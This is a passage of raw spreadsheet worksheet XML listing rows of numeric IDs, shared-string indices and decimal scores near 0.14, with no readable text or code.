      </c>
      <c r="F491" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="492" ht="15.75" customHeight="1">
      <c r="A492" s="1">
        <v>26945.0</v>
      </c>
      <c r="B492" s="2">
        <v>1.9573648E7</v>
      </c>
      <c r="C492" s="2" t="s">
        <v>432</v>
      </c>
      <c r="D492" s="2">
        <v>1.0</v>
      </c>
      <c r="E492" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F492" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="493" ht="15.75" customHeight="1">
      <c r="A493" s="1">
        <v>27677.0</v>
      </c>
      <c r="B493" s="2">
        <v>2.2938601E7</v>
      </c>
      <c r="C493" s="2" t="s">
        <v>433</v>
      </c>
      <c r="D493" s="2">
        <v>1.0</v>
      </c>
      <c r="E493" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F493" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="494" ht="15.75" customHeight="1">
      <c r="A494" s="1">
        <v>27940.0</v>
      </c>
      <c r="B494" s="2">
        <v>2.380863E7</v>
      </c>
      <c r="C494" s="2" t="s">
        <v>434</v>
      </c>
      <c r="D494" s="2">
        <v>1.0</v>
      </c>
      <c r="E494" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F494" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="495" ht="15.75" customHeight="1">
      <c r="A495" s="1">
        <v>29145.0</v>
      </c>
      <c r="B495" s="2">
        <v>3.0585362E7</v>
      </c>
      <c r="C495" s="2" t="s">
        <v>435</v>
      </c>
      <c r="D495" s="2">
        <v>1.0</v>
      </c>
      <c r="E495" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F495" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="496" ht="15.75" customHeight="1">
      <c r="A496" s="1">
        <v>29218.0</v>
      </c>
      <c r="B496" s="2">
        <v>3.0811512E7</v>
      </c>
      <c r="C496" s="2" t="s">
        <v>421</v>
      </c>
      <c r="D496" s="2">
        <v>1.0</v>
      </c>
      <c r="E496" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F496" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="497" ht="15.75" customHeight="1">
      <c r="A497" s="1">
        <v>29839.0</v>
      </c>
      <c r="B497" s="2">
        <v>3.5566805E7</v>
      </c>
      <c r="C497" s="2" t="s">
        <v>436</v>
      </c>
      <c r="D497" s="2">
        <v>1.0</v>
      </c>
      <c r="E497" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F497" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="498" ht="15.75" customHeight="1">
      <c r="A498" s="1">
        <v>31257.0</v>
      </c>
      <c r="B498" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C498" s="2" t="s">
        <v>437</v>
      </c>
      <c r="D498" s="2">
        <v>1.0</v>
      </c>
      <c r="E498" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F498" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="499" ht="15.75" customHeight="1">
      <c r="A499" s="1">
        <v>32498.0</v>
      </c>
      <c r="B499" s="2">
        <v>5.7090817E7</v>
      </c>
      <c r="C499" s="2" t="s">
        <v>438</v>
      </c>
      <c r="D499" s="2">
        <v>1.0</v>
      </c>
      <c r="E499" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F499" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="500" ht="15.75" customHeight="1">
      <c r="A500" s="1">
        <v>25978.0</v>
      </c>
      <c r="B500" s="2">
        <v>1.5292334E7</v>
      </c>
      <c r="C500" s="2" t="s">
        <v>439</v>
      </c>
      <c r="D500" s="2">
        <v>1.0</v>
      </c>
      <c r="E500" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F500" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="501" ht="15.75" customHeight="1">
      <c r="A501" s="1">
        <v>29086.0</v>
      </c>
      <c r="B501" s="2">
        <v>3.0363033E7</v>
      </c>
      <c r="C501" s="2" t="s">
        <v>440</v>
      </c>
      <c r="D501" s="2">
        <v>1.0</v>
      </c>
      <c r="E501" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F501" s="2">
        <v>0.1407914764079148</v>
      </c>
    </row>
    <row r="502" ht="15.75" customHeight="1">
      <c r="A502" s="1">
        <v>28278.0</v>
      </c>
      <c r="B502" s="2">
        <v>2.5474446E7</v>
      </c>
      <c r="C502" s="2" t="s">
        <v>441</v>
      </c>
      <c r="D502" s="2">
        <v>1.0</v>
      </c>
      <c r="E502" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F502" s="2">
        <v>0.1405723905723906</v>
      </c>
    </row>
    <row r="503" ht="15.75" customHeight="1">
      <c r="A503" s="1">
        <v>29547.0</v>
      </c>
      <c r="B503" s="2">
        <v>3.3039438E7</v>
      </c>
      <c r="C503" s="2" t="s">
        <v>442</v>
      </c>
      <c r="D503" s="2">
        <v>1.0</v>
      </c>
      <c r="E503" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F503" s="2">
        <v>0.1404761904761906</v>
      </c>
    </row>
    <row r="504" ht="15.75" customHeight="1">
      <c r="A504" s="1">
        <v>30614.0</v>
      </c>
      <c r="B504" s="2">
        <v>4.1359793E7</v>
      </c>
      <c r="C504" s="2" t="s">
        <v>443</v>
      </c>
      <c r="D504" s="2">
        <v>1.0</v>
      </c>
      <c r="E504" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F504" s="2">
        <v>0.1402116402116402</v>
      </c>
    </row>
    <row r="505" ht="15.75" customHeight="1">
      <c r="A505" s="1">
        <v>23219.0</v>
      </c>
      <c r="B505" s="2">
        <v>5.2772841E7</v>
      </c>
      <c r="C505" s="2" t="s">
        <v>444</v>
      </c>
      <c r="D505" s="2">
        <v>1.0</v>
      </c>
      <c r="E505" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F505" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="506" ht="15.75" customHeight="1">
      <c r="A506" s="1">
        <v>28704.0</v>
      </c>
      <c r="B506" s="2">
        <v>2.7756353E7</v>
      </c>
      <c r="C506" s="2" t="s">
        <v>445</v>
      </c>
      <c r="D506" s="2">
        <v>1.0</v>
      </c>
      <c r="E506" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F506" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="507" ht="15.75" customHeight="1">
      <c r="A507" s="1">
        <v>27656.0</v>
      </c>
      <c r="B507" s="2">
        <v>2.2840504E7</v>
      </c>
      <c r="C507" s="2" t="s">
        <v>446</v>
      </c>
      <c r="D507" s="2">
        <v>1.0</v>
      </c>
      <c r="E507" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F507" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="508" ht="15.75" customHeight="1">
      <c r="A508" s="1">
        <v>31920.0</v>
      </c>
      <c r="B508" s="2">
        <v>5.3041319E7</v>
      </c>
      <c r="C508" s="2" t="s">
        <v>447</v>
      </c>
      <c r="D508" s="2">
        <v>1.0</v>
      </c>
      <c r="E508" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F508" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="509" ht="15.75" customHeight="1">
      <c r="A509" s="1">
        <v>25148.0</v>
      </c>
      <c r="B509" s="2">
        <v>1.3053143E7</v>
      </c>
      <c r="C509" s="2" t="s">
        <v>448</v>
      </c>
      <c r="D509" s="2">
        <v>1.0</v>
      </c>
      <c r="E509" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F509" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="510" ht="15.75" customHeight="1">
      <c r="A510" s="1">
        <v>26412.0</v>
      </c>
      <c r="B510" s="2">
        <v>1.7104046E7</v>
      </c>
      <c r="C510" s="2" t="s">
        <v>449</v>
      </c>
      <c r="D510" s="2">
        <v>1.0</v>
      </c>
      <c r="E510" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F510" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="511" ht="15.75" customHeight="1">
      <c r="A511" s="1">
        <v>28950.0</v>
      </c>
      <c r="B511" s="2">
        <v>2.9720701E7</v>
      </c>
      <c r="C511" s="2" t="s">
        <v>450</v>
      </c>
      <c r="D511" s="2">
        <v>1.0</v>
      </c>
      <c r="E511" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F511" s="2">
        <v>0.1393762183235867</v>
      </c>
    </row>
    <row r="512" ht="15.75" customHeight="1">
      <c r="A512" s="1">
        <v>14528.0</v>
      </c>
      <c r="B512" s="2">
        <v>3.982249E7</v>
      </c>
      <c r="C512" s="2" t="s">
        <v>451</v>
      </c>
      <c r="D512" s="2">
        <v>1.0</v>
      </c>
      <c r="E512" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F512" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="513" ht="15.75" customHeight="1">
      <c r="A513" s="1">
        <v>15918.0</v>
      </c>
      <c r="B513" s="2">
        <v>4.4662843E7</v>
      </c>
      <c r="C513" s="2" t="s">
        <v>452</v>
      </c>
      <c r="D513" s="2">
        <v>1.0</v>
      </c>
      <c r="E513" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F513" s="2">
        <v>0.1393162393162393</v>
      </c>
    </row>
    <row r="514" ht="15.75" customHeight="1">
      <c r="A514" s="1">
        <v>26788.0</v>
      </c>
      <c r="B514" s="2">
        <v>1.8562403E7</v>
      </c>
      <c r="C514" s="2" t="s">
        <v>453</v>
      </c>
      <c r="D514" s="2">
        <v>1.0</v>
      </c>
      <c r="E514" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F514" s="2">
        <v>0.1393162393162393</v>
      </c>
    </row>
    <row r="515" ht="15.75" customHeight="1">
      <c r="A515" s="1">
        <v>32022.0</v>
      </c>
      <c r="B515" s="2">
        <v>5354791.0</v>
      </c>
      <c r="C515" s="2" t="s">
        <v>454</v>
      </c>
      <c r="D515" s="2">
        <v>1.0</v>
      </c>
      <c r="E515" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F515" s="2">
        <v>0.1392914653784219</v>
      </c>
    </row>
    <row r="516" ht="15.75" customHeight="1">
      <c r="A516" s="1">
        <v>10827.0</v>
      </c>
      <c r="B516" s="2">
        <v>1.5984964E7</v>
      </c>
      <c r="C516" s="2" t="s">
        <v>455</v>
      </c>
      <c r="D516" s="2">
        <v>1.0</v>
      </c>
      <c r="E516" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F516" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="517" ht="15.75" customHeight="1">
      <c r="A517" s="1">
        <v>17468.0</v>
      </c>
      <c r="B517" s="2">
        <v>4.9878183E7</v>
      </c>
      <c r="C517" s="2" t="s">
        <v>456</v>
      </c>
      <c r="D517" s="2">
        <v>1.0</v>
      </c>
      <c r="E517" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F517" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="518" ht="15.75" customHeight="1">
      <c r="A518" s="1">
        <v>29820.0</v>
      </c>
      <c r="B518" s="2">
        <v>3.5285948E7</v>
      </c>
      <c r="C518" s="2" t="s">
        <v>457</v>
      </c>
      <c r="D518" s="2">
        <v>1.0</v>
      </c>
      <c r="E518" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F518" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="519" ht="15.75" customHeight="1">
      <c r="A519" s="1">
        <v>6526.0</v>
      </c>
      <c r="B519" s="2">
        <v>4.882019E7</v>
      </c>
      <c r="C519" s="2" t="s">
        <v>458</v>
      </c>
      <c r="D519" s="2">
        <v>1.0</v>
      </c>
      <c r="E519" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F519" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="520" ht="15.75" customHeight="1">
      <c r="A520" s="1">
        <v>13174.0</v>
      </c>
      <c r="B520" s="2">
        <v>3.4008577E7</v>
      </c>
      <c r="C520" s="2" t="s">
        <v>459</v>
      </c>
      <c r="D520" s="2">
        <v>1.0</v>
      </c>
      <c r="E520" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F520" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="521" ht="15.75" customHeight="1">
      <c r="A521" s="1">
        <v>20550.0</v>
      </c>
      <c r="B521" s="2">
        <v>1.3382563E7</v>
      </c>
      <c r="C521" s="2" t="s">
        <v>460</v>
      </c>
      <c r="D521" s="2">
        <v>1.0</v>
      </c>
      <c r="E521" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F521" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="522" ht="15.75" customHeight="1">
      <c r="A522" s="1">
        <v>20993.0</v>
      </c>
      <c r="B522" s="2">
        <v>1.7104047E7</v>
      </c>
      <c r="C522" s="2" t="s">
        <v>461</v>
      </c>
      <c r="D522" s="2">
        <v>1.0</v>
      </c>
      <c r="E522" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F522" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="523" ht="15.75" customHeight="1">
      <c r="A523" s="1">
        <v>21061.0</v>
      </c>
      <c r="B523" s="2">
        <v>1.7800528E7</v>
      </c>
      <c r="C523" s="2" t="s">
        <v>462</v>
      </c>
      <c r="D523" s="2">
        <v>1.0</v>
      </c>
      <c r="E523" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F523" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="524" ht="15.75" customHeight="1">
      <c r="A524" s="1">
        <v>24051.0</v>
      </c>
      <c r="B524" s="2">
        <v>9558521.0</v>
      </c>
      <c r="C524" s="2" t="s">
        <v>463</v>
      </c>
      <c r="D524" s="2">
        <v>1.0</v>
      </c>
      <c r="E524" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F524" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="525" ht="15.75" customHeight="1">
      <c r="A525" s="1">
        <v>24819.0</v>
      </c>
      <c r="B525" s="2">
        <v>1.2089172E7</v>
      </c>
      <c r="C525" s="2" t="s">
        <v>464</v>
      </c>
      <c r="D525" s="2">
        <v>1.0</v>
      </c>
      <c r="E525" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F525" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="526" ht="15.75" customHeight="1">
      <c r="A526" s="1">
        <v>26557.0</v>
      </c>
      <c r="B526" s="2">
        <v>1.7800527E7</v>
      </c>
      <c r="C526" s="2" t="s">
        <v>462</v>
      </c>
      <c r="D526" s="2">
        <v>1.0</v>
      </c>
      <c r="E526" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F526" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="527" ht="15.75" customHeight="1">
      <c r="A527" s="1">
        <v>28167.0</v>
      </c>
      <c r="B527" s="2">
        <v>2.4934884E7</v>
      </c>
      <c r="C527" s="2" t="s">
        <v>465</v>
      </c>
      <c r="D527" s="2">
        <v>1.0</v>
      </c>
      <c r="E527" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F527" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="528" ht="15.75" customHeight="1">
      <c r="A528" s="1">
        <v>28565.0</v>
      </c>
      <c r="B528" s="2">
        <v>2.6923561E7</v>
      </c>
      <c r="C528" s="2" t="s">
        <v>420</v>
      </c>
      <c r="D528" s="2">
        <v>1.0</v>
      </c>
      <c r="E528" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F528" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="529" ht="15.75" customHeight="1">
      <c r="A529" s="1">
        <v>22748.0</v>
      </c>
      <c r="B529" s="2">
        <v>4.4314661E7</v>
      </c>
      <c r="C529" s="2" t="s">
        <v>466</v>
      </c>
      <c r="D529" s="2">
        <v>1.0</v>
      </c>
      <c r="E529" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F529" s="2">
        <v>0.1384742951907131</v>
      </c>
    </row>
    <row r="530" ht="15.75" customHeight="1">
      <c r="A530" s="1">
        <v>13531.0</v>
      </c>
      <c r="B530" s="2">
        <v>3.5584311E7</v>
      </c>
      <c r="C530" s="2" t="s">
        <v>467</v>
      </c>
      <c r="D530" s="2">
        <v>1.0</v>
      </c>
      <c r="E530" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F530" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="531" ht="15.75" customHeight="1">
      <c r="A531" s="1">
        <v>15626.0</v>
      </c>
      <c r="B531" s="2">
        <v>4.3560082E7</v>
      </c>
      <c r="C531" s="2" t="s">
        <v>468</v>
      </c>
      <c r="D531" s="2">
        <v>1.0</v>
      </c>
      <c r="E531" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F531" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="532" ht="15.75" customHeight="1">
      <c r="A532" s="1">
        <v>20520.0</v>
      </c>
      <c r="B532" s="2">
        <v>1.3110828E7</v>
      </c>
      <c r="C532" s="2" t="s">
        <v>469</v>
      </c>
      <c r="D532" s="2">
        <v>1.0</v>
      </c>
      <c r="E532" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F532" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="533" ht="15.75" customHeight="1">
      <c r="A533" s="1">
        <v>21149.0</v>
      </c>
      <c r="B533" s="2">
        <v>1.8740458E7</v>
      </c>
      <c r="C533" s="2" t="s">
        <v>470</v>
      </c>
      <c r="D533" s="2">
        <v>1.0</v>
      </c>
      <c r="E533" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F533" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="534" ht="15.75" customHeight="1">
      <c r="A534" s="1">
        <v>21894.0</v>
      </c>
      <c r="B534" s="2">
        <v>2.7814539E7</v>
      </c>
      <c r="C534" s="2" t="s">
        <v>471</v>
      </c>
      <c r="D534" s="2">
        <v>1.0</v>
      </c>
      <c r="E534" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F534" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="535" ht="15.75" customHeight="1">
      <c r="A535" s="1">
        <v>22639.0</v>
      </c>
      <c r="B535" s="2">
        <v>4.0641788E7</v>
      </c>
      <c r="C535" s="2" t="s">
        <v>472</v>
      </c>
      <c r="D535" s="2">
        <v>1.0</v>
      </c>
      <c r="E535" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F535" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="536" ht="15.75" customHeight="1">
      <c r="A536" s="1">
        <v>23013.0</v>
      </c>
      <c r="B536" s="2">
        <v>4985338.0</v>
      </c>
      <c r="C536" s="2" t="s">
        <v>473</v>
      </c>
      <c r="D536" s="2">
        <v>1.0</v>
      </c>
      <c r="E536" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F536" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="537" ht="15.75" customHeight="1">
      <c r="A537" s="1">
        <v>24697.0</v>
      </c>
      <c r="B537" s="2">
        <v>1.1630585E7</v>
      </c>
      <c r="C537" s="2" t="s">
        <v>474</v>
      </c>
      <c r="D537" s="2">
        <v>1.0</v>
      </c>
      <c r="E537" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F537" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="538" ht="15.75" customHeight="1">
      <c r="A538" s="1">
        <v>25294.0</v>
      </c>
      <c r="B538" s="2">
        <v>1.3410205E7</v>
      </c>
      <c r="C538" s="2" t="s">
        <v>475</v>
      </c>
      <c r="D538" s="2">
        <v>1.0</v>
      </c>
      <c r="E538" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F538" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="539" ht="15.75" customHeight="1">
      <c r="A539" s="1">
        <v>26993.0</v>
      </c>
      <c r="B539" s="2">
        <v>1.9798869E7</v>
      </c>
      <c r="C539" s="2" t="s">
        <v>402</v>
      </c>
      <c r="D539" s="2">
        <v>1.0</v>
      </c>
      <c r="E539" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F539" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="540" ht="15.75" customHeight="1">
      <c r="A540" s="1">
        <v>28100.0</v>
      </c>
      <c r="B540" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C540" s="2" t="s">
        <v>476</v>
      </c>
      <c r="D540" s="2">
        <v>1.0</v>
      </c>
      <c r="E540" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F540" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="541" ht="15.75" customHeight="1">
      <c r="A541" s="1">
        <v>29748.0</v>
      </c>
      <c r="B541" s="2">
        <v>3.4740796E7</v>
      </c>
      <c r="C541" s="2" t="s">
        <v>477</v>
      </c>
      <c r="D541" s="2">
        <v>1.0</v>
      </c>
      <c r="E541" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F541" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="542" ht="15.75" customHeight="1">
      <c r="A542" s="1">
        <v>30237.0</v>
      </c>
      <c r="B542" s="2">
        <v>3.7468807E7</v>
      </c>
      <c r="C542" s="2" t="s">
        <v>478</v>
      </c>
      <c r="D542" s="2">
        <v>1.0</v>
      </c>
      <c r="E542" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F542" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="543" ht="15.75" customHeight="1">
      <c r="A543" s="1">
        <v>31798.0</v>
      </c>
      <c r="B543" s="2">
        <v>5237183.0</v>
      </c>
      <c r="C543" s="2" t="s">
        <v>479</v>
      </c>
      <c r="D543" s="2">
        <v>1.0</v>
      </c>
      <c r="E543" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F543" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="544" ht="15.75" customHeight="1">
      <c r="A544" s="1">
        <v>32179.0</v>
      </c>
      <c r="B544" s="2">
        <v>5.4647162E7</v>
      </c>
      <c r="C544" s="2" t="s">
        <v>480</v>
      </c>
      <c r="D544" s="2">
        <v>1.0</v>
      </c>
      <c r="E544" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F544" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="545" ht="15.75" customHeight="1">
      <c r="A545" s="1">
        <v>1665.0</v>
      </c>
      <c r="B545" s="2">
        <v>2.8205035E7</v>
      </c>
      <c r="C545" s="2" t="s">
        <v>481</v>
      </c>
      <c r="D545" s="2">
        <v>1.0</v>
      </c>
      <c r="E545" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F545" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="546" ht="15.75" customHeight="1">
      <c r="A546" s="1">
        <v>2776.0</v>
      </c>
      <c r="B546" s="2">
        <v>3.5182635E7</v>
      </c>
      <c r="C546" s="2" t="s">
        <v>482</v>
      </c>
      <c r="D546" s="2">
        <v>1.0</v>
      </c>
      <c r="E546" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F546" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="547" ht="15.75" customHeight="1">
      <c r="A547" s="1">
        <v>14484.0</v>
      </c>
      <c r="B547" s="2">
        <v>3.9553448E7</v>
      </c>
      <c r="C547" s="2" t="s">
        <v>483</v>
      </c>
      <c r="D547" s="2">
        <v>1.0</v>
      </c>
      <c r="E547" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F547" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="548" ht="15.75" customHeight="1">
      <c r="A548" s="1">
        <v>21256.0</v>
      </c>
      <c r="B548" s="2">
        <v>2.0040321E7</v>
      </c>
      <c r="C548" s="2" t="s">
        <v>484</v>
      </c>
      <c r="D548" s="2">
        <v>1.0</v>
      </c>
      <c r="E548" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F548" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="549" ht="15.75" customHeight="1">
      <c r="A549" s="1">
        <v>21421.0</v>
      </c>
      <c r="B549" s="2">
        <v>2.2067602E7</v>
      </c>
      <c r="C549" s="2" t="s">
        <v>485</v>
      </c>
      <c r="D549" s="2">
        <v>1.0</v>
      </c>
      <c r="E549" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F549" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="550" ht="15.75" customHeight="1">
      <c r="A550" s="1">
        <v>21565.0</v>
      </c>
      <c r="B550" s="2">
        <v>2.3728897E7</v>
      </c>
      <c r="C550" s="2" t="s">
        <v>486</v>
      </c>
      <c r="D550" s="2">
        <v>1.0</v>
      </c>
      <c r="E550" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F550" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="551" ht="15.75" customHeight="1">
      <c r="A551" s="1">
        <v>23157.0</v>
      </c>
      <c r="B551" s="2">
        <v>5190986.0</v>
      </c>
      <c r="C551" s="2" t="s">
        <v>487</v>
      </c>
      <c r="D551" s="2">
        <v>1.0</v>
      </c>
      <c r="E551" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F551" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="552" ht="15.75" customHeight="1">
      <c r="A552" s="1">
        <v>23332.0</v>
      </c>
      <c r="B552" s="2">
        <v>5.4647163E7</v>
      </c>
      <c r="C552" s="2" t="s">
        <v>480</v>
      </c>
      <c r="D552" s="2">
        <v>1.0</v>
      </c>
      <c r="E552" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F552" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="553" ht="15.75" customHeight="1">
      <c r="A553" s="1">
        <v>23413.0</v>
      </c>
      <c r="B553" s="2">
        <v>5603078.0</v>
      </c>
      <c r="C553" s="2" t="s">
        <v>488</v>
      </c>
      <c r="D553" s="2">
        <v>1.0</v>
      </c>
      <c r="E553" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F553" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="554" ht="15.75" customHeight="1">
      <c r="A554" s="1">
        <v>23649.0</v>
      </c>
      <c r="B554" s="2">
        <v>6739238.0</v>
      </c>
      <c r="C554" s="2" t="s">
        <v>489</v>
      </c>
      <c r="D554" s="2">
        <v>1.0</v>
      </c>
      <c r="E554" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F554" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="555" ht="15.75" customHeight="1">
      <c r="A555" s="1">
        <v>26326.0</v>
      </c>
      <c r="B555" s="2">
        <v>1.6720064E7</v>
      </c>
      <c r="C555" s="2" t="s">
        <v>490</v>
      </c>
      <c r="D555" s="2">
        <v>1.0</v>
      </c>
      <c r="E555" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F555" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="556" ht="15.75" customHeight="1">
      <c r="A556" s="1">
        <v>26398.0</v>
      </c>
      <c r="B556" s="2">
        <v>1.7021018E7</v>
      </c>
      <c r="C556" s="2" t="s">
        <v>491</v>
      </c>
      <c r="D556" s="2">
        <v>1.0</v>
      </c>
      <c r="E556" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F556" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="557" ht="15.75" customHeight="1">
      <c r="A557" s="1">
        <v>27418.0</v>
      </c>
      <c r="B557" s="2">
        <v>2.1828459E7</v>
      </c>
      <c r="C557" s="2" t="s">
        <v>492</v>
      </c>
      <c r="D557" s="2">
        <v>1.0</v>
      </c>
      <c r="E557" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F557" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="558" ht="15.75" customHeight="1">
      <c r="A558" s="1">
        <v>28111.0</v>
      </c>
      <c r="B558" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C558" s="2" t="s">
        <v>493</v>
      </c>
      <c r="D558" s="2">
        <v>1.0</v>
      </c>
      <c r="E558" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F558" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="559" ht="15.75" customHeight="1">
      <c r="A559" s="1">
        <v>29583.0</v>
      </c>
      <c r="B559" s="2">
        <v>3.3502954E7</v>
      </c>
      <c r="C559" s="2" t="s">
        <v>494</v>
      </c>
      <c r="D559" s="2">
        <v>1.0</v>
      </c>
      <c r="E559" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F559" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="560" ht="15.75" customHeight="1">
      <c r="A560" s="1">
        <v>30159.0</v>
      </c>
      <c r="B560" s="2">
        <v>3.704579E7</v>
      </c>
      <c r="C560" s="2" t="s">
        <v>495</v>
      </c>
      <c r="D560" s="2">
        <v>1.0</v>
      </c>
      <c r="E560" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F560" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="561" ht="15.75" customHeight="1">
      <c r="A561" s="1">
        <v>30550.0</v>
      </c>
      <c r="B561" s="2">
        <v>4.0641787E7</v>
      </c>
      <c r="C561" s="2" t="s">
        <v>472</v>
      </c>
      <c r="D561" s="2">
        <v>1.0</v>
